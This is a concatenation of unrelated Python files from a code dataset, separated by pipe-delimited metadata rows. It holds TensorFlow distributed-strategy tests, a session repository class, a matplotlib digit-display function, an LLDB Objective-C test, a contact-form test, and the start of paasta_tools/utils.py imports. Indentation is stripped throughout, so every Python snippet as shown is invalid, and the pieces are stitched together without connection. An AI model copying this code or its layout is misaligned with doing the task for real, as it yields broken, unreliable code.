def model_fn():
return mirrored_var.assign(5.0)
if getattr(distribution.extended, "_use_merge_call", True):
with self.assertRaisesRegex(
ValueError, "A non-DistributedValues value 5.0 cannot be reduced "
"with the given reduce op ReduceOp.SUM."):
self.evaluate(distribution.experimental_local_results(
distribution.extended.call_for_each_replica(model_fn)))
else:
result = self.evaluate(
distribution.experimental_local_results(
distribution.extended.call_for_each_replica(model_fn)))
self.assertAllEqual(result[0], 5.0)
def testAssignMirroredVarCrossDeviceContext(self, distribution):
def var_fn():
return variable_scope.variable(1.0, name="foo")
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(1.0, self.evaluate(mirrored_var))
mirrored_var_result = self.evaluate(mirrored_var.assign(6.0))
self.assertEqual(6.0, mirrored_var_result)
def testAssignMirroredVarReplicaContext(self, distribution):
def var_fn():
return variable_scope.variable(
1.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(1.0, self.evaluate(mirrored_var))
def model_fn():
value = math_ops.cast(
ds_context.get_replica_context().replica_id_in_sync_group,
mirrored_var.dtype)
return mirrored_var.assign(value)
self.evaluate(distribution.experimental_local_results(
distribution.extended.call_for_each_replica(model_fn)))
self.assertEqual(0.5, self.evaluate(mirrored_var))
def testAssignMirroredVarReplicaContextWithSingleValue(self, distribution):
def var_fn():
return variable_scope.variable(
1.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(1.0, self.evaluate(mirrored_var))
def model_fn():
return mirrored_var.assign(5.0)
self.evaluate(distribution.experimental_local_results(
distribution.extended.call_for_each_replica(model_fn)))
self.assertEqual(5.0, self.evaluate(mirrored_var))
def testAssignAddMirroredVarCrossDeviceContext(self, distribution):
def var_fn():
return variable_scope.variable(1.0, name="foo")
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(1.0, self.evaluate(mirrored_var))
# read_value == True
mirrored_var_result = self.evaluate(
mirrored_var.assign_add(6.0, read_value=True))
self.assertEqual(7.0, mirrored_var_result)
self.assertEqual(
7.0,
self.evaluate(
distribution.experimental_local_results(mirrored_var)[0]))
self.assertEqual(
7.0,
self.evaluate(
distribution.experimental_local_results(mirrored_var)[1]))
self.assertEqual(
distribution.extended.worker_devices[0], mirrored_var._devices[0])
self.assertEqual(
distribution.extended.worker_devices[1], mirrored_var._devices[1])
# read_value == False
self.evaluate(mirrored_var.assign_add(2.0, read_value=False))
self.assertEqual(
9.0,
self.evaluate(
distribution.experimental_local_results(mirrored_var)[0]))
self.assertEqual(
9.0,
self.evaluate(
distribution.experimental_local_results(mirrored_var)[1]))
self.assertEqual(
distribution.extended.worker_devices[0], mirrored_var._devices[0])
self.assertEqual(
distribution.extended.worker_devices[1], mirrored_var._devices[1])
def testAssignAddMirroredVarReplicaContext(self, distribution):
def var_fn():
return variable_scope.variable(
1.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(1.0, self.evaluate(mirrored_var))
def model_fn():
value = math_ops.cast(
ds_context.get_replica_context().replica_id_in_sync_group,
mirrored_var.dtype)
return mirrored_var.assign_add(value)
self.evaluate(distribution.experimental_local_results(
distribution.extended.call_for_each_replica(model_fn)))
self.assertEqual(1.5, self.evaluate(mirrored_var))
def testAssignAddMirroredVarReplicaContextWithSingleValue(self, distribution):
def var_fn():
return variable_scope.variable(
1.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(1.0, self.evaluate(mirrored_var))
def model_fn():
return mirrored_var.assign_add(5.0)
self.evaluate(distribution.experimental_local_results(
distribution.extended.call_for_each_replica(model_fn)))
self.assertEqual(6.0, self.evaluate(mirrored_var))
def testAssignSubMirroredVarCrossDeviceContext(self, distribution):
def var_fn():
return variable_scope.variable(5.0, name="foo")
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(5.0, self.evaluate(mirrored_var))
mirrored_var_result = self.evaluate(mirrored_var.assign_sub(2.0))
self.assertEqual(3.0, mirrored_var_result)
self.assertEqual(
3.0,
self.evaluate(
distribution.experimental_local_results(mirrored_var)[0]))
self.assertEqual(
3.0,
self.evaluate(
distribution.experimental_local_results(mirrored_var)[1]))
self.assertEqual(
distribution.extended.worker_devices[0], mirrored_var._devices[0])
self.assertEqual(
distribution.extended.worker_devices[1], mirrored_var._devices[1])
def testAssignSubMirroredVarReplicaContext(self, distribution):
def var_fn():
return variable_scope.variable(
5.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(5.0, self.evaluate(mirrored_var))
def model_fn():
value = math_ops.cast(
ds_context.get_replica_context().replica_id_in_sync_group,
mirrored_var.dtype)
return mirrored_var.assign_sub(value)
self.evaluate(distribution.experimental_local_results(
distribution.extended.call_for_each_replica(model_fn)))
self.assertEqual(4.5, self.evaluate(mirrored_var))
def testAssignSubMirroredVarReplicaContextWithSingleValue(self, distribution):
def var_fn():
return variable_scope.variable(
5.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(5.0, self.evaluate(mirrored_var))
def model_fn():
return mirrored_var.assign_sub(1.0)
self.evaluate(distribution.experimental_local_results(
distribution.extended.call_for_each_replica(model_fn)))
self.assertEqual(4.0, self.evaluate(mirrored_var))
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
],
mode=["graph", "eager"]))
class MirroredAndSyncOnReadVariableInitializerTest(test.TestCase):
def testAssignMirroredVarInitializer(self, distribution):
# This test is not eager compatible since in eager variables are initialized
# upon construction instead of once the initialization op is run.
with context.graph_mode():
def var_fn():
v = variable_scope.variable(1.0, name="foo")
return v
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.assertFalse(self.evaluate(mirrored_var.is_initialized()))
self.evaluate(mirrored_var.initializer)
self.assertTrue(self.evaluate(mirrored_var.is_initialized()))
def testAssignReplicaLocalVarInitializer(self, distribution):
# This test is not eager compatible since in eager variables are initialized
# upon construction instead of once the initialization op is run.
with context.graph_mode():
def model_fn():
v_sum = variable_scope.variable(
1.0,
synchronization=variable_scope.VariableSynchronization.ON_READ,
aggregation=variable_scope.VariableAggregation.SUM)
self.assertTrue(distribute_utils.is_sync_on_read(v_sum))
return v_sum
with distribution.scope():
sync_on_read_var = distribution.extended.call_for_each_replica(
model_fn)
self.assertTrue(distribute_utils.is_sync_on_read(sync_on_read_var))
self.assertFalse(self.evaluate(sync_on_read_var.is_initialized()))
self.evaluate(sync_on_read_var.initializer)
self.assertTrue(self.evaluate(sync_on_read_var.is_initialized()))
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
],
mode=["graph", "eager"]))
class SyncOnReadVariableAssignTest(test.TestCase):
def testAssignReplicaLocalVarSumAggregation(self, distribution):
def model_fn():
v_sum = variable_scope.variable(
1.0,
synchronization=variable_scope.VariableSynchronization.ON_READ,
aggregation=variable_scope.VariableAggregation.SUM)
return v_sum
with distribution.scope():
sync_on_read_var = distribution.extended.call_for_each_replica(model_fn)
self.assertTrue(distribute_utils.is_sync_on_read(sync_on_read_var))
self.evaluate(variables.global_variables_initializer())
# Each replica has a value of 1.0 assigned to it in replica context.
# When we read the value using `read_var` we should see the SUM of each of
# values on each of the replicas.
self.assertEqual(2.0, self.evaluate(
distribution.extended.read_var(sync_on_read_var)))
# Assigning 6.0 in cross replica context will assign a value of
# 6.0/num_replicas to each replica.
tlv_ops = sync_on_read_var.assign(6.0)
self.evaluate(tlv_ops)
# On reading the sync on read var we should get the assigned value back.
# The value on all the replicas are added before being returned by
# `read_var`.
self.assertEqual(6.0, self.evaluate(
distribution.extended.read_var(sync_on_read_var)))
def testAssignReplicaLocalVarMeanAggregation(self, distribution):
def model_fn():
v_sum = variable_scope.variable(
1.0,
synchronization=variable_scope.VariableSynchronization.ON_READ,
aggregation=variable_scope.VariableAggregation.MEAN)
return v_sum
with distribution.scope():
sync_on_read_var = distribution.extended.call_for_each_replica(model_fn)
self.assertTrue(distribute_utils.is_sync_on_read(sync_on_read_var))
self.evaluate(variables.global_variables_initializer())
# Each replica has a value of 1.0 assigned to it in replica context.
# When we read the value using `read_var` we should see the MEAN of values
# on all replicas which is the value assigned in replica context.
self.assertEqual(1.0, self.evaluate(
distribution.extended.read_var(sync_on_read_var)))
tlv_ops = sync_on_read_var.assign(6.0)
self.evaluate(tlv_ops)
# On reading the sync on read var we should get the MEAN of all values
# which is equal to the value assigned.
self.assertEqual(6.0, self.evaluate(
distribution.extended.read_var(sync_on_read_var)))
class MockModel(object):
def __init__(self, two_variables=False):
self.variables = []
self.variables.append(variable_scope.variable(1.25, name="dummy_var1"))
if two_variables:
self.variables.append(variable_scope.variable(2.0, name="dummy_var2"))
def __call__(self, factor=2):
x = factor * self.variables[0]
if len(self.variables) > 1:
x += self.variables[1]
return x
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
],
mode=["graph", "eager"]))
class MirroredStrategyDefunTest(test.TestCase):
def _call_and_check(self, distribution, model_fn, inputs, expected_result,
defuns, two_variables=False):
cpu_dev = device_util.canonicalize("CPU:0")
gpu_dev = device_util.canonicalize("GPU:0")
devices = [cpu_dev, gpu_dev]
with distribution.scope():
mock_model = MockModel(two_variables)
self.evaluate(variables.global_variables_initializer())
result = distribution.extended.call_for_each_replica(
model_fn, args=[mock_model] + inputs)
for r in range(len(devices)):
device_result = distribute_utils.select_replica(r, result)
device_expected_result = distribute_utils.select_replica(
r, expected_result)
self.assertAllClose(device_expected_result,
self.evaluate(device_result))
for defun in defuns:
# `Function`s are specialized to the current device stack, so
# call_for_each has one trace per device. To check that the expected set
# of variables was accessed on each trace, we first retrieve each
# device-specific graph function.
per_replica_graph_functions = (
distribution.extended.call_for_each_replica(
defun.get_concrete_function, args=[mock_model] + inputs))
for i in range(len(devices)):
graph_function = distribution.experimental_local_results(
per_replica_graph_functions)[i]
# TODO(b/129555712): re-enable an assertion here that the two sets of
# variables are the same.
# self.assertEqual(set(graph_function.graph.variables),
# set(mock_model.variables))
del graph_function
def testVariableInDefun(self, distribution):
@function.defun
def times_two(mock_model):
return mock_model()
def model_fn(mock_model):
return times_two(mock_model)
self._call_and_check(distribution, model_fn, [], 2.5, [times_two])
def testVariableInNestedDefun(self, distribution):
@function.defun
def times_two(mock_model):
return mock_model()
@function.defun
def two_x_plus_one(mock_model):
return times_two(mock_model) + 1
def model_fn(mock_model):
return two_x_plus_one(mock_model)
self._call_and_check(distribution, model_fn, [], 3.5,
[times_two, two_x_plus_one])
def testTwoVariablesInNestedDefun(self, distribution):
@function.defun
def fn1(mock_model):
return mock_model()
@function.defun
def fn2(mock_model):
return fn1(mock_model) + 1
def model_fn(mock_model):
return fn2(mock_model)
self._call_and_check(distribution, model_fn, [], 5.5, [fn1, fn2],
two_variables=True)
def testGradientTapeOverNestedDefuns(self, distribution):
@function.defun
def fn1(mock_model):
return mock_model()
@function.defun
def fn2(mock_model):
return fn1(mock_model) + 1
def model_fn(mock_model):
with backprop.GradientTape(persistent=True) as gtape:
result = fn2(mock_model)
grads = gtape.gradient(result,
[v._get() for v in mock_model.variables])
return grads
self._call_and_check(distribution, model_fn, [], [2.0, 1.0], [fn1, fn2],
two_variables=True)
def testPassPerReplica(self, distribution):
@function.defun
def fn1(mock_model, factor):
return mock_model(factor)
factors = values.PerReplica((5.0, 3.0))
expected_result = values.PerReplica((5.0 * 1.25, 3.0 * 1.25))
self._call_and_check(distribution, fn1, [factors], expected_result, [fn1])
@combinations.generate(
combinations.combine(
distribution=[
combinations.NamedDistribution(
"Mirrored",
# pylint: disable=g-long-lambda
lambda: mirrored_strategy.MirroredStrategy(
devices=mirrored_strategy.all_local_devices(),
cross_device_ops=cross_device_ops_lib.ReductionToOneDevice(
),
),
required_gpus=1)
],
mode=["graph"]))
class MultiWorkerMirroredStrategyTest(
multi_worker_test_base.MultiWorkerTestBase,
strategy_test_lib.DistributionTestBase):
def _configure_distribution_strategy(self, distribution):
cluster_spec = server_lib.ClusterSpec({
"worker": ["/job:worker/task:0", "/job:worker/task:1"]
})
distribution.configure(cluster_spec=cluster_spec)
def test_num_replicas_in_sync(self, distribution):
self._configure_distribution_strategy(distribution)
# We calculate the total number of gpus across the workers(2) specified in
# the cluster spec.
self.assertEqual(context.num_gpus() * 2, distribution.num_replicas_in_sync)
def testMinimizeLossGraph(self, distribution):
self._configure_distribution_strategy(distribution)
self._test_minimize_loss_graph(distribution, learning_rate=0.05)
def testDeviceScope(self, distribution):
"""Test the device scope of multi-worker MirroredStrategy."""
self._configure_distribution_strategy(distribution)
with distribution.scope():
a = constant_op.constant(1.)
with ops.device("/cpu:0"):
b = constant_op.constant(1.)
self.assertEqual(a.device, "/job:worker/task:0")
self.assertEqual(b.device, "/job:worker/task:0/device:CPU:0")
def testMakeInputFnIteratorWithDataset(self, distribution):
self._configure_distribution_strategy(distribution)
dataset_fn = lambda: dataset_ops.Dataset.range(100)
num_gpus = context.num_gpus()
num_workers = 2
expected_values = [[i+j for j in range(num_gpus)] * num_workers
for i in range(0, 100, num_gpus)]
with context.graph_mode(), self.cached_session() as sess:
# `expected_input_pipeline_id` is None because the input_fn will be called
# multiple times, each with a different input_pipeline_id.
input_fn = self._input_fn_to_test_input_context(
dataset_fn,
expected_num_replicas_in_sync=num_workers*num_gpus,
expected_num_input_pipelines=num_workers,
expected_input_pipeline_id=None)
iterator = distribution.make_input_fn_iterator(input_fn)
self._test_input_fn_iterator(
iterator, distribution.extended.worker_devices, expected_values, sess)
def testMakeInputFnIteratorWithCallable(self, distribution):
self._configure_distribution_strategy(distribution)
def fn():
dataset = dataset_ops.Dataset.range(100)
it = dataset_ops.make_one_shot_iterator(dataset)
return it.get_next
num_gpus = context.num_gpus()
num_workers = 2
expected_values = []
for i in range(0, 100, num_gpus):
expected_values.append([i+j for j in range(num_gpus)] * num_workers)
with context.graph_mode(), self.cached_session() as sess:
# `expected_input_pipeline_id` is None because the input_fn will be called
# multiple times, each with a different input_pipeline_id.
input_fn = self._input_fn_to_test_input_context(
fn,
expected_num_replicas_in_sync=num_workers*num_gpus,
expected_num_input_pipelines=num_workers,
expected_input_pipeline_id=None)
iterator = distribution.make_input_fn_iterator(input_fn)
self._test_input_fn_iterator(
iterator, distribution.extended.worker_devices, expected_values, sess,
test_reinitialize=False, ignore_order=True)
def testUpdateConfigProto(self, distribution):
distribution.configure(cluster_spec={"worker": ["fake1", "fake2"]})
config_proto = config_pb2.ConfigProto()
new_config = distribution.update_config_proto(config_proto)
# Verify isolate_session_state
self.assertTrue(new_config.isolate_session_state)
@combinations.generate(
combinations.combine(
distribution=[
combinations.NamedDistribution(
"Mirrored",
# pylint: disable=g-long-lambda
lambda: mirrored_strategy.MirroredStrategy(
devices=["/job:worker/task:0/gpu:{}".format(
i) for i in range(context.num_gpus())]),
required_gpus=1)
],
mode=["graph"]))
class RemoteSingleWorkerMirroredStrategyGraph(
multi_worker_test_base.SingleWorkerTestBaseGraph,
strategy_test_lib.RemoteSingleWorkerMirroredStrategyBase):
def _get_num_gpus(self):
return context.num_gpus()
def testNumReplicasInSync(self, distribution):
self._testNumReplicasInSync(distribution)
def testMinimizeLoss(self, distribution):
self._testMinimizeLoss(distribution)
def testDeviceScope(self, distribution):
self._testDeviceScope(distribution)
def testMakeInputFnIteratorWithDataset(self, distribution):
self._testMakeInputFnIteratorWithDataset(distribution)
def testMakeInputFnIteratorWithCallable(self, distribution):
self._testMakeInputFnIteratorWithCallable(distribution)
class MultiWorkerMirroredStrategyTestWithChief(
multi_worker_test_base.MultiWorkerTestBase,
strategy_test_lib.DistributionTestBase):
@classmethod
def setUpClass(cls):
"""Create a local cluster with 2 workers and 1 chief."""
cls._cluster_spec = multi_worker_test_base.create_in_process_cluster(
num_workers=2, num_ps=0, has_chief=True)
cls._default_target = "grpc://" + cls._cluster_spec["chief"][0]
def _make_cross_device_ops(self):
return cross_device_ops_lib.ReductionToOneDevice()
def testMinimizeLossGraph(self):
with context.graph_mode():
strategy = mirrored_strategy.MirroredStrategy(
cross_device_ops=self._make_cross_device_ops())
strategy.configure(cluster_spec=self._cluster_spec)
self._test_minimize_loss_graph(strategy, learning_rate=0.05)
def testMinimizeLossGraphMirroredStrategy(self):
with context.graph_mode():
strategy = mirrored_strategy.MirroredStrategy(
mirrored_strategy.all_local_devices(),
cross_device_ops=self._make_cross_device_ops())
strategy.configure(cluster_spec=self._cluster_spec)
self._test_minimize_loss_graph(strategy, learning_rate=0.05)
def testMinimizeLossGraphMirroredStrategyWithOneNode(self):
with context.graph_mode():
cluster_spec = {}
cluster_spec["chief"] = self._cluster_spec["chief"]
tf_config = {"cluster": cluster_spec}
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(tf_config)}):
strategy = mirrored_strategy.MirroredStrategy()
if context.num_gpus() == 0:
self.assertIsInstance(strategy.extended._inferred_cross_device_ops,
cross_device_ops_lib.ReductionToOneDevice)
self.skipTest("b/130551176, run the following once fixed.")
self._test_minimize_loss_graph(strategy, learning_rate=0.05)
def testInitializeFromTFConfig(self):
with context.graph_mode():
tf_config = {"cluster": self._cluster_spec}
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(tf_config)}):
strategy = mirrored_strategy.MirroredStrategy(
cross_device_ops=self._make_cross_device_ops())
self.assertEqual(
max(context.num_gpus(), 1) * 3, strategy.num_replicas_in_sync)
def testSummaryForReplicaZeroOnly(self):
with context.graph_mode():
strategy = mirrored_strategy.MirroredStrategy(
mirrored_strategy.all_local_devices(),
cross_device_ops=self._make_cross_device_ops())
strategy.configure(cluster_spec=self._cluster_spec)
self._test_summary_for_replica_zero_only(strategy)
class MirroredVariableStopGradientTest(test.TestCase, parameterized.TestCase):
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_one_cpu,
strategy_combinations.mirrored_strategy_with_one_gpu,
],
mode=["graph"]))
def testMirroredVariableAsStopGradient(self, distribution):
with distribution.scope():
inp = constant_op.constant(1.0)
x = variables.Variable(1.0)
y = inp*x
grads = gradients.gradients(x, y, stop_gradients=x)
self.assertIsNone(grads[0])
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
],
mode=["eager"]))
class FunctionTest(test.TestCase, parameterized.TestCase):
def testBackwardFunctionDevicePlacement(self, distribution):
with distribution.scope():
w = variable_scope.variable([1.5], name="w")
b = variable_scope.variable([0.5], name="b")
@def_function.function
def forward(x, w, b):
return x * w + b
x = array_ops.identity([1.0], name="x_useless")
concrete_forward = forward.get_concrete_function(x, w._primary, b._primary)
with distribution.scope():
def replica_fn():
with backprop.GradientTape() as t:
x = array_ops.identity([1.0], name="x")
loss = concrete_forward(x, w._get(), b._get()) - [1.0]
return t.gradient(loss, [w, b])
def step_fn():
return distribution.run(replica_fn)
context.enable_run_metadata()
g1, g2 = step_fn()
run_metadata = context.export_run_metadata()
context.disable_run_metadata()
self.assertEqual(self.evaluate(g1._primary), 1.0)
self.assertEqual(self.evaluate(g2._primary), 1.0)
# Verify that this node runs on both devices.
node_name = "gradients_mul_grad_mul_1_x"
devices_for_this_node = set()
for partition_graph in run_metadata.partition_graphs:
for node in partition_graph.node:
if node.name == node_name:
devices_for_this_node.add(node.device)
devices = [device_util.resolve("/device:GPU:0"),
device_util.resolve("/device:CPU:0")]
self.assertSetEqual(devices_for_this_node, set(devices))
def testFuctionPreservesAutoGraph(self, distribution):
def f():
self.assertTrue(converter_testing.is_inside_generated_code())
return 1
with distribution.scope():
@def_function.function
def replica_fn():
return f()
distribution.run(replica_fn)
def _replica_id():
replica_id = ds_context.get_replica_context().replica_id_in_sync_group
if not isinstance(replica_id, ops.Tensor):
replica_id = constant_op.constant(replica_id)
return array_ops.identity(replica_id)
def _replica_id_as_int():
replica_id = ds_context.get_replica_context().replica_id_in_sync_group
if isinstance(replica_id, ops.Tensor):
replica_id = tensor_util.constant_value(replica_id)
return replica_id
if __name__ == "__main__":
# TODO(b/172304955)
test_util.main(config_logical_devices=False)
| 39.18873 | 91 | 0.715669 |
d27fc11c83cfd912d163f06289825633042a3cfe | 213 | py | Python | repositories/session.py | jsmsalt/jobs-api | a2c26522bf7f997558f6c6608524187785c830e5 | [
"MIT"
] | null | null | null | repositories/session.py | jsmsalt/jobs-api | a2c26522bf7f997558f6c6608524187785c830e5 | [
"MIT"
] | 5 | 2021-11-29T04:40:14.000Z | 2021-11-29T12:33:44.000Z | repositories/session.py | jsmsalt/jobs-api | a2c26522bf7f997558f6c6608524187785c830e5 | [
"MIT"
] | null | null | null | from repositories.base import BaseRepository
from models.session import Session, SessionCreate, SessionUpdate
class SessionRepository(BaseRepository[Session, SessionCreate, SessionUpdate]):
entity = Session
| 30.428571 | 79 | 0.835681 |
7fac08a2a2203bfc19fbd54ef85b6df016377052 | 1,376 | py | Python | machine-learning-ex4/ex4/displayData.py | altermarkive/machine-learning-course | 2f0a2c2269dab2bd61d34d96a75ccdd8b87683c7 | [
"MIT"
] | 1 | 2018-05-11T20:58:03.000Z | 2018-05-11T20:58:03.000Z | machine-learning-ex4/ex4/displayData.py | altermarkive/Machine-Learning-Course | 2f0a2c2269dab2bd61d34d96a75ccdd8b87683c7 | [
"MIT"
] | null | null | null | machine-learning-ex4/ex4/displayData.py | altermarkive/Machine-Learning-Course | 2f0a2c2269dab2bd61d34d96a75ccdd8b87683c7 | [
"MIT"
] | 2 | 2016-11-04T13:40:31.000Z | 2018-05-11T20:58:05.000Z | #!/usr/bin/env python3
import numpy as np
import matplotlib
# Force matplotlib to not use any X Windows backend (must be called befor importing pyplot)
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def displayData(X, example_width=None):
#DISPLAYDATA Display 2D data in a nice grid
# [h, display_array] = DISPLAYDATA(X, example_width) displays 2D data
# stored in X in a nice grid. It returns the figure handle h and the
# displayed array if requested.
figsize = (10, 10)
# Set example_width automatically if not passed in
example_width = example_width or int(np.round(np.sqrt(X.shape[1])))
# Gray Image
cmap='Greys'
# Compute rows, cols
m, n = X.shape
example_height = n / example_width
# Compute number of items to display
display_rows = int(np.floor(np.sqrt(m)))
display_cols = int(np.ceil(m / display_rows))
# Between images padding
pad = 0.025
# Display Image
fig, ax_array = plt.subplots(display_rows, display_cols, figsize=figsize)
fig.subplots_adjust(wspace=pad, hspace=pad)
ax_array = [ax_array] if m == 1 else ax_array.ravel()
for i, ax in enumerate(ax_array):
ax.imshow(X[i].reshape(example_width, example_width, order='F'), cmap=cmap, extent=[0, 1, 0, 1])
# Do not show axis
ax.axis('off')
return fig, ax_array
#end
| 28.666667 | 104 | 0.675872 |
08e9594be69ffb9d1d01e052b2c61482df6161da | 2,198 | py | Python | SymbolExtractorAndRenamer/lldb/packages/Python/lldbsuite/test/lang/objc/objc-optimized/TestObjcOptimized.py | Polidea/SiriusObfuscator | b0e590d8130e97856afe578869b83a209e2b19be | [
"Apache-2.0"
] | 427 | 2018-05-29T14:21:02.000Z | 2022-03-16T03:17:54.000Z | SymbolExtractorAndRenamer/lldb/packages/Python/lldbsuite/test/lang/objc/objc-optimized/TestObjcOptimized.py | PolideaPlayground/SiriusObfuscator | b0e590d8130e97856afe578869b83a209e2b19be | [
"Apache-2.0"
] | 25 | 2018-07-23T08:34:15.000Z | 2021-11-05T07:13:36.000Z | SymbolExtractorAndRenamer/lldb/packages/Python/lldbsuite/test/lang/objc/objc-optimized/TestObjcOptimized.py | PolideaPlayground/SiriusObfuscator | b0e590d8130e97856afe578869b83a209e2b19be | [
"Apache-2.0"
] | 52 | 2018-07-19T19:57:32.000Z | 2022-03-11T16:05:38.000Z | """
Test that objective-c expression parser continues to work for optimized build.
http://llvm.org/viewvc/llvm-project?rev=126973&view=rev
Fixed a bug in the expression parser where the 'this'
or 'self' variable was not properly read if the compiler
optimized it into a register.
"""
from __future__ import print_function
import os
import time
import lldb
import re
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
# rdar://problem/9087739
# test failure: objc_optimized does not work for "-C clang -A i386"
@skipUnlessDarwin
class ObjcOptimizedTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
myclass = "MyClass"
mymethod = "description"
method_spec = "-[%s %s]" % (myclass, mymethod)
def test_break(self):
"""Test 'expr member' continues to work for optimized build."""
self.build()
exe = os.path.join(os.getcwd(), "a.out")
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_symbol(
self,
self.method_spec,
num_expected_locations=1,
sym_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
self.expect(
"thread backtrace",
STOPPED_DUE_TO_BREAKPOINT,
substrs=["stop reason = breakpoint"],
patterns=[
"frame.*0:.*%s %s" %
(self.myclass,
self.mymethod)])
self.expect('expression member',
startstr="(int) $0 = 5")
# <rdar://problem/12693963>
interp = self.dbg.GetCommandInterpreter()
result = lldb.SBCommandReturnObject()
interp.HandleCommand('frame variable self', result)
output = result.GetOutput()
desired_pointer = "0x0"
mo = re.search("0x[0-9a-f]+", output)
if mo:
desired_pointer = mo.group(0)
self.expect('expression (self)',
substrs=[("(%s *) $1 = " % self.myclass), desired_pointer])
self.expect('expression self->non_member', error=True,
substrs=["does not have a member named 'non_member'"])
| 28.545455 | 79 | 0.617834 |
82e3b7df8ee2491938e9799e144029492dbb5685 | 645 | py | Python | test/test_add_contact.py | 12ok/python_train | 436d6a02a83b3bcb6ff248968366dae0a9cafc2e | [
"Apache-2.0"
] | null | null | null | test/test_add_contact.py | 12ok/python_train | 436d6a02a83b3bcb6ff248968366dae0a9cafc2e | [
"Apache-2.0"
] | null | null | null | test/test_add_contact.py | 12ok/python_train | 436d6a02a83b3bcb6ff248968366dae0a9cafc2e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from model.contact import Contact
# test падает если есть символы ' \
# оставила полный вывод в repr для проверки какие данные указывались
def test_add_contact(app, json_contacts, db, check_ui):
contact = json_contacts
old_contacts = db.get_contact_list()
app.contact.create(contact)
new_contacts = db.get_contact_list()
old_contacts.append(contact)
assert old_contacts == new_contacts
if check_ui:
assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(),
key=Contact.id_or_max)
| 40.3125 | 100 | 0.663566 |
a571c43154a87082374a795232b487c155d84487 | 127,749 | py | Python | paasta_tools/utils.py | cuza/paasta | 15d1b5b09f5d92e4619bf0f3eca70996d1be1639 | [
"Apache-2.0"
] | null | null | null | paasta_tools/utils.py | cuza/paasta | 15d1b5b09f5d92e4619bf0f3eca70996d1be1639 | [
"Apache-2.0"
] | null | null | null | paasta_tools/utils.py | cuza/paasta | 15d1b5b09f5d92e4619bf0f3eca70996d1be1639 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015-2017 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import datetime
import difflib
import errno
import fcntl
import getpass
import glob
import hashlib
import io
import json
import logging
import math
import os
import pwd
import queue
import re
import shlex
import signal
import socket
import ssl
import sys
import tempfile
import threading
import time
import warnings
from collections import OrderedDict
from enum import Enum
from fnmatch import fnmatch
from functools import lru_cache
from functools import wraps
from subprocess import PIPE
from subprocess import Popen
from subprocess import STDOUT
from types import FrameType
from typing import Any
from typing import Callable
from typing import cast
from typing import Collection
from typing import ContextManager
from typing import Dict
from typing import FrozenSet
from typing import IO
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Sequence
from typing import Set
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
import choice
import dateutil.tz
import ldap3
import requests_cache
import service_configuration_lib
from docker import Client
from docker.utils import kwargs_from_env
from kazoo.client import KazooClient
from mypy_extensions import TypedDict
from service_configuration_lib import read_service_configuration
import paasta_tools.cli.fsm
# DO NOT CHANGE SPACER, UNLESS YOU'RE PREPARED TO CHANGE ALL INSTANCES
